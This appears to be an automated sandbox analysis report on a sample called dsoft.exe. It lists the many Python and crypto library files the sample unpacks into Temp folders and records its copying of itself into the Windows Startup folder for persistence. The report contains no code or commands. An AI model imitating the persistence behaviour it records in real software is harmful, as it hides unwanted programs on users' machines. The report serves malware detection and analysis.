Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\win32\win32api.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\win32\_win32sysloader.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\charset_normalizer\md__mypyc.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\python310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\pywin32_system32\pythoncom310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\win32\_win32sysloader.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Pythonwin\win32ui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_poly1305.pyd	Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Users\user\Desktop\dsoft.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe

Jump to dropped file

Source: C:\Users\user\Desktop\dsoft.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe

Jump to behavior

Source: C:\Users\user\Desktop\dsoft.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe

Jump to behavior

Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\win32\win32trace.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\win32com\shell\shell.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32\pywintypes310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Pythonwin\mfc140u.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\charset_normalizer\md.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32\pythoncom310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\win32com\shell\shell.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\python310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Pythonwin\win32ui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\_cffi_backend.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\_cffi_backend.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\win32\win32api.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\pywin32_system32\pywintypes310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Pythonwin\mfc140u.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\charset_normalizer\md.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\charset_normalizer\md__mypyc.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\win32\win32trace.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\win32\win32api.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\win32\_win32sysloader.pyd	Jump to dropped file
